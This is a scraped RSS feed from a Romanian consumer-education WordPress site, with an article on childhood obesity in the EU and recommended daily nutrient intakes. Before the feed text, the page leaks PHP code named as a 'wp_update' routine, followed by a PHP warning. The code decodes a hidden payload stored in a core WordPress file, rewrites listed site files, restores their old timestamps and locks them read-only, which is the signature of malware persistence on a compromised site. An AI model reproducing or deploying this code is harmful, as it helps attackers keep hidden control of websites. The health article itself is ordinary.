$wp_update_file="/home/shuffles/public_html/wp-includes/date-time.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } }
Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/feed-rss2.php on line 8
DZR – O noua atitudine http://o9atitudine.ro Un site de educare si informare in domeniul protectiei consumatorilor, protectiei mediului, contrafacerii si pirateriei Tue, 07 Apr 2009 14:20:59 +0000 en-US hourly 1 https://wordpress.org/?v=6.4.4 http://o9atitudine.ro/wp-content/uploads/cropped-o-9-atitudine_albastru_mare-32x32.png DZR – O noua atitudine http://o9atitudine.ro 32 32 Alege sănătos! Si tu poţi! http://o9atitudine.ro/info/alege-sanatos-si-tu-poti/ Thu, 19 Mar 2009 23:12:21 +0000 http://o9atitudine.ro/?p=115 o 9 atitudine!
Obezitatea copiilor – o mare problemă şi în Uniunea Europeană

14 milioane de copii sunt supraponderali şi trei milioane obezi în UE. În câteva state membre deja jumătate dintre adulţi sunt supraponderali şi între 20% şi 30% riscă să devină obezi. Obezitatea a devenit o epidemie europeană şi afectează în principal copiii şi adolescenţii – conform unui raport al Parlamentului European. Propunerile de antidot includ: o mai bună informare a consumatorilor, mâncarea sănătoasă la şcoală şi sportul.

O alimentaţie sănătoasă, activităţile fizice regulate constituie cea mai bună prevenţie împotriva obezităţii infantile!

Obezitatea şi excesul ponderal reprezintă una din cele mai mari provocări în domeniul sănătăţii în Europa de azi. În unele părţi ale Europei 27% dintre bărbaţi şi 38% dintre femei sunt obezi, iar numărul copiilor supraponderali creşte rapid (în momentul de faţă cu 400.000 pe an).
Obezitatea contribuie la o serie de boli grave, precum bolile de inimă, diabetul, hipertensiunea şi anumite tipuri de cancer.

Cea mai grea problemă rămâne sedentarismul, căci majoritatea oamenilor se urca în maşină, pleacă la serviciu, acolo se urca în lift, apoi îşi ocupă locul pe scaun, iar în lift, iar în maşină, iar la masă, iar pe fotoliu, în faţa televizorului, încă o masă copioasă înainte de culcare şi… gata,
obezitatea este asigurată.

Doza Zilnică Recomandată (DZR)

Reprezintă aportul de substanţe nutritive considerat a fi optim pentru toate grupele populaţionale.
Doza Zilnică Recomandată este individuală, diferită de la o persoană la alta.
Tabelele DZR se bazează pe valorile recomandate în multe ţări europene, precum şi pe cele ale Organizaţiei Mondiale a Sănătăţii.
Dozele se calculează la un aport caloric mediu, aproximativ 2000 – 2500 kcal/zi.

Doza Zilnică Recomandată pentru copiii peste 7 ani

Doza Zilnică Recomandată pentru calorii este adecvată pentru menţine-
rea greutăţii corporale.
Pentru menţinerea unei diete echilibrate acordaţi o atenţie deosebită
consumului de calorii.

Doza Zilnică Recomandată pentru adulţi cu masă medie corporală aport caloric mediu 2000 – 2500 kcal/zi.

Dacă doriţi să slăbiţi, vă recomandă să consultaţi un medic specialist în nutriţie sau dietetician.

Ştiaţi că . . .
În multe ţări europene, procentul adulţilor obezi a crescut de câteva ori, din 1980 şi până astăzi. Rata de obezitate tinde să fie mai mare la femei decât la bărbaţi. În România, rata obezităţii este de 25%, iar în Grecia a atins 38%.
Trei milioane de copii europeni de vârstă şcolară sunt obezi. În fiecare an, alţi 85.000 de copii devin obezi, iar această cifră produce o mare îngrijorare. Marea Britanie deţine cea mai ridicată rată de creştere a obezităţii în rândul tinerilor. Printre copii cu vârste cuprinse între 11 şi 15 ani, nivelul incidenţei obezităţii a crescut cu 75%, în mai puţin de un deceniu. Obezitatea infantilă înseamnă că mulţi dintre aceşti copii contractează ”boli adulte”, cum este diabetul zaharat de tip II.
Creşterea numărului de persoane supraponderale dublează pericolul obezităţii. Se estimează că jumătate din populaţia adultă şi un sfert dintre copiii de vârstă şcolară din UE sunt supraponderali.
Stilul de viaţă este principala cauză a obezităţii. În 1999, locuitorii Uniunii Europene au consumat cu circa 300 de calorii mai mult pe zi, decât în 1970. Unul din trei europeni nu face sport şi petrece mai mult de cinci ore pe zi, stând pe scaun.

Etichetarea – citeşte eticheta produsului: ingredientele pe care le
conţine, data expirării, producătorii acestora, originea lor, modul de
depozitare şi de preparare a produselor.

Piramida alimentelor tratează o linie a ceea ce trebuie să mâncăm în fiecare zi.

E mult mai uşor să previi decât să tratezi!
Alege sănătos şi tu poţi!

]]>